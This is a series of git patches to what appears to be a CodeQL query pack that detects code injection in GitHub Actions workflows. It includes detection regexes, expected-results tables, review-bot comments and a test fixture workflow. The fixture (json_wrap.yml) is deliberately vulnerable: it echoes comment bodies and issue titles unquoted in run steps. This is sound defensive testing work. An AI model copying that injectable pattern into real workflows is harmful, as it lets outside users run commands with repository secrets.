github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} |
+| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} |
diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref
new file mode 100644
index 000000000000..fbd758b6bd62
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref
@@ -0,0 +1 @@
+Security/CWE-094/PrivilegedCodeInjection.ql
From 5908d6c567601c74b9fc2f684a0c8c811ca4170a Mon Sep 17 00:00:00 2001
From: Jorge <46056498+jorgectf@users.noreply.github.com>
Date: Fri, 15 Mar 2024 11:23:37 +0100
Subject: [PATCH 124/707] Fix tokens
---
 action.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/action.yml b/action.yml
index f88e3b078509..e8f13962e819 100644
--- a/action.yml
+++ b/action.yml
@@ -24,7 +24,7 @@ runs:
 - name: Do something with context
 shell: bash
 env:
- GITHUB_TOKEN: ${{ github.token }}
- GH_TOKEN: ${{ github.token }}
+ GITHUB_TOKEN: ${{ inputs.token }}
+ GH_TOKEN: ${{ inputs.token }}
 run: |
 node ${{ github.action_path }}/.github/action/dist/index.js
From 01d8d79e6d36b294d6638bee30ec6809cf96cf6b Mon Sep 17 00:00:00 2001
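Review bot: The step now reads `inputs.token` for both `GITHUB_TOKEN` and `GH_TOKEN`, but the `inputs:` block that must declare `token` is outside this hunk, so it is not visible whether it carries a default; if it does not, every caller that previously relied on the implicit `github.token` now runs the bundled script with an empty token, and callers that pass a PAT run it with whatever scope that PAT has. I would declare it as `token: { description: "Token used by the action", required: false, default: "${{ github.token }}" }` so the default behaviour matches the old one, and state in the action's README which permissions the script actually needs so users are not tempted to hand it a broad PAT. Passing the token through `env:` rather than interpolating it into `run:` is the right shape and should stay as is.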
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 15 Mar 2024 13:34:12 +0100
Subject: [PATCH 125/707] Bump versions
---
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index d211b8fc2baf..4dd2ab2866e6 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: githubsecuritylab/actions-all
-version: 0.0.2
+version: 0.0.3
 dependencies:
 codeql/controlflow: "*"
 codeql/dataflow: "*"
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 61ef9d40ab5f..90647d422407 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: githubsecuritylab/actions-queries
-version: 0.0.2
+version: 0.0.3
 groups:
 - actions
 - queries
From 6cb15f06bceaa9c6304743f5e4c6a49015f82c00 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 15 Mar 2024 13:54:21 +0100
Subject: [PATCH 126/707] fix(fn): Apply json wrappers to source regexps
---
 ql/lib/codeql/actions/Ast.qll | 5 ++
 ql/lib/codeql/actions/ast/internal/Ast.qll | 18 +++---
 .../codeql/actions/dataflow/FlowSources.qll | 18 +++---
 .../CWE-094/.github/workflows/json_wrap.yml | 59 +++++++++++++++++++
 .../Security/CWE-094/CodeInjection.expected | 4 ++
 .../CWE-094/PrivilegedCodeInjection.expected | 4 ++
 6 files changed, 89 insertions(+), 19 deletions(-)
 create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 4a7ff12b4f96..91612c5836b1 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -9,6 +9,11 @@ module Utils {
 .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1")
 .regexpReplaceAll("\\s*\\.\\s*", ".")
 }
+
+ bindingset[regex]
+ string wrapRegexp(string regex) {
+ result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"]
+ }
 }
 class AstNode instanceof AstNodeImpl {
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index f45565caed77..3fa1769e762d 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
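Review bot: `wrapRegexp` only recognises `fromJSON(`/`toJSON(` when the reference follows the parenthesis immediately and `)` follows it immediately, so an expression written as `toJSON( github.event.issue.title )` is not matched and the source is silently dropped; `normalizeExpr` just above only collapses whitespace around dots, not after `(` or before `)`. Since the callers use `regexpMatch`, which as far as I recall must match the whole string, I would allow optional whitespace in the two function alternatives: `"fromJSON\\(\\s*" + regex + "\\s*\\)", "toJSON\\(\\s*" + regex + "\\s*\\)"`. The fixture added in this same commit contains exactly that spaced shape (`toJSON( secrets.JIRA_LAYER_CAKE )`), so it is a form real workflows use. A one-line QLDoc on the predicate stating that it yields three alternatives (bare, `fromJSON(...)`, `toJSON(...)`) and that callers pass an unanchored regex would also help, since the `\\b` anchoring now lives here.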
@@ -813,28 +813,24 @@ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl {
 }
 private string stepsCtxRegex() {
- result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)")
+ result = Utils::wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)")
 }
 private string needsCtxRegex() {
- result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)")
+ result = Utils::wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)")
 }
 private string jobsCtxRegex() {
- result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)")
+ result = Utils::wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)")
 }
-private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") }
+private string envCtxRegex() { result = Utils::wrapRegexp("env\\.([A-Za-z0-9_-]+)") }
-private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") }
+private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") }
 private string inputsCtxRegex() {
- result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"])
-}
-
-bindingset[regex]
-private string wrapRegexp(string regex) {
- result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"]
+ result =
+ Utils::wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"])
 }
 /**
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index a586cab4a322..ca1d21637867 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
@@ -28,7 +28,7 @@ private predicate isExternalUserControlledIssue(string context) {
 exists(string reg |
 reg = ["\\bgithub\\.event\\.issue\\.title\\b", "\\bgithub\\.event\\.issue\\.body\\b"]
 |
- Utils::normalizeExpr(context).regexpMatch(reg)
+ Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg))
 )
 }
@@ -45,18 +45,20 @@ private predicate isExternalUserControlledPullRequest(string context) {
 "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b"
 ]
 |
- Utils::normalizeExpr(context).regexpMatch(reg)
+ Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg))
 )
 }
 bindingset[context]
 private predicate isExternalUserControlledReview(string context) {
- Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.review\\.body\\b")
+ Utils::normalizeExpr(context)
+ .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.review\\.body\\b"))
 }
 bindingset[context]
 private predicate isExternalUserControlledComment(string context) {
- Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.comment\\.body\\b")
+ Utils::normalizeExpr(context)
+ .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.comment\\.body\\b"))
 }
 bindingset[context]
@@ -68,7 +70,7 @@ private predicate isExternalUserControlledGollum(string context) {
 "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.title\\b"
 ]
 |
- Utils::normalizeExpr(context).regexpMatch(reg)
+ Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg))
 )
 }
@@ -89,7 +91,7 @@ private predicate isExternalUserControlledCommit(string context) {
 "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name\\b",
 ]
 |
- Utils::normalizeExpr(context).regexpMatch(reg)
+ Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg))
 )
 }
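Review bot: The regex literals handed to `Utils::wrapRegexp` here still carry their own `\\b` anchors, so after wrapping the bare alternative reads `\\b\\bgithub\\.event\\.issue\\.title\\b\\b` and the JSON ones `toJSON\\(\\bgithub\\.event\\.issue\\.title\\b\\)`; as far as I can tell this is harmless, but it is redundant and hides the fact that anchoring is now the wrapper's job. The internal context regexes in `ast/internal/Ast.qll` changed in this same commit pass unanchored patterns such as `"env\\.([A-Za-z0-9_-]+)"`, and this file should follow the same convention, e.g. `reg = ["github\\.event\\.issue\\.title", "github\\.event\\.issue\\.body"]` in `isExternalUserControlledIssue` and likewise for the other lists. Only the lines inside each hunk are visible; the remaining entries of the `pull_request`, `gollum` and `commit` lists start above their hunks and would need the same treatment.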
@@ -98,7 +100,7 @@ private predicate isExternalUserControlledDiscussion(string context) {
 exists(string reg |
 reg = ["\\bgithub\\.event\\.discussion\\.title\\b", "\\bgithub\\.event\\.discussion\\.body\\b"]
 |
- Utils::normalizeExpr(context).regexpMatch(reg)
+ Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg))
 )
 }
@@ -118,7 +120,7 @@ private predicate isExternalUserControlledWorkflowRun(string context) {
 "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.name\\b",
 ]
 |
- Utils::normalizeExpr(context).regexpMatch(reg)
+ Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg))
 )
 }
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml
new file mode 100644
index 000000000000..b17a1fecbeb4
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml
@@ -0,0 +1,59 @@
+name: Issue Comment Created
+
+on:
+ issue_comment:
+ types:
+ - created
+
+jobs:
+ jira:
+ runs-on: ubuntu-latest
+ if: ${{ github.event.comment.body == '/jira ticket' }}
+ steps:
+ - run: echo ${{ github.event.comment.body }}
+
+ - name: Login
+ uses: atlassian/gajira-login@v3
+ env:
+ JIRA_BASE_URL: ${{ secrets.JIRA_BASE_URL }}
+ JIRA_USER_EMAIL: ${{ secrets.JIRA_USER_EMAIL }}
+ JIRA_API_TOKEN: ${{ secrets.JIRA_API_TOKEN }}
+
+ - name: SearchParam
+ run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}'
+
+ - name: Search
+ id: search
+ uses: tomhjp/gh-action-jira-search@v0.2.1
+ with:
+ jql: 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}'
+
+ - name: Log
+ run: echo "Found issue ${{ steps.search.outputs.issue }}"
+
+ - name: Create
+ id: create
+ if: steps.search.outputs.issue == ''
+ uses: atlassian/gajira-create@v3
+ with:
+ project: ${{ secrets.JIRA_PROJECT }}
+ issuetype: Task
+ summary: '${{ github.event.repository.name }}: ${{ github.event.issue.title }}'
+ description: |
+ *Issue Link:* ${{ github.event.issue.html_url }}
+
+ ${{ github.event.issue.body }}
+ fields: '{"customfield_10006": ${{ toJSON(secrets.JIRA_EPIC_TICKET) }}, "customfield_17401":{"value":${{ toJSON( secrets.JIRA_LAYER_CAKE )}}}}'
+
+ - name: Add Comment
+ if: steps.search.outputs.issue == '' && steps.create.outputs.issue != ''
+ uses: actions/github-script@v6
+ with:
+ github-token: ${{secrets.GITHUB_TOKEN}}
+ script: |
+ github.rest.issues.createComment({
+ issue_number: context.issue.number,
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ body: '👋 Thanks, Jira [${{steps.create.outputs.issue}}] ticket created.'
+ })
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected
index 23e502567561..14b0c535ac62 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected
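Review bot: The new fixture only pins the `toJSON(` alternative of the wrapper (the `run:` step on line 23) plus the bare form on line 13, which is also what the updated `.expected` files record; nothing exercises `fromJSON(` on a user-controlled context, and the one call with spaces inside the parentheses, `toJSON( secrets.JIRA_LAYER_CAKE )` on line 46, is a secret rather than a source, so it cannot show whether the wrapper tolerates that spacing. I would add two more `run:` steps, `- run: echo ${{ fromJSON(github.event.comment.body) }}` and `- run: echo ${{ toJSON( github.event.issue.title ) }}`, and record the matching rows in `CodeInjection.expected` and `PrivilegedCodeInjection.expected`, so every alternative produced by `wrapRegexp` is covered by a test. A short comment at the top of the file naming which wrapper forms it is meant to cover would make the intent clear to whoever edits it next.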
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -131,6 +131,8 @@ nodes | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | 
@@ -234,6 +236,8 @@ subpaths | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 9101c80a5955..bdb5ae3ea556 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -131,6 +131,8 @@ nodes | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | 
@@ -229,6 +231,8 @@ subpaths | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | From d9e589c6e7d913c2e3a987c0f2a30676a47df15b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 13:58:46 +0100 Subject: [PATCH 127/707] Remove unnecessary boundary anchors --- ql/lib/codeql/actions/Ast.qll | 6 +- .../codeql/actions/dataflow/FlowSources.qll | 64 +++++++++---------- 2 files changed, 34 insertions(+), 36 deletions(-) 
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 91612c5836b1..ecc0ad16f5f4 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -12,7 +12,11 @@ module Utils { bindingset[regex] string wrapRegexp(string regex) { - result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] + result = + [ + "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", + "toJSON\\(\\s*" + regex + "\\s*\\)" + ] } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index ca1d21637867..007ace43bd0c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -25,9 +25,7 @@ abstract class RemoteFlowSource extends SourceNode { bindingset[context] private predicate isExternalUserControlledIssue(string context) { - exists(string reg | - reg = ["\\bgithub\\.event\\.issue\\.title\\b", "\\bgithub\\.event\\.issue\\.body\\b"] - | + exists(string reg | reg = ["github\\.event\\.issue\\.title", "github\\.event\\.issue\\.body"] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } 
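Review bot: `wrapRegexp` still matches `fromJSON(`/`toJSON(` case-sensitively, while the Actions expression parser accepts function and context names in any case, so unless `normalizeExpr` already folds case — not visible in this hunk — spellings such as `tojson(github.event.issue.title)` are silently not treated as sources. A `(?i)` prefix on the wrapped forms, e.g. `"(?i)fromJSON\\(\\s*" + regex + "\\s*\\)", "(?i)toJSON\\(\\s*" + regex + "\\s*\\)"` (and likewise on the `\\b` form for context-name case), closes that gap. Because `regexpMatch` is a whole-string match, only these three exact shapes are recognised; nesting such as `fromJSON(toJSON(x))` or an expression embedded in `format(...)` is not, which deserves a QLDoc line on the predicate, e.g. `/** Wraps `regex` so it matches the bare expression or the sole argument of `fromJSON`/`toJSON`; nested or composite expressions are not recognised. */`.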
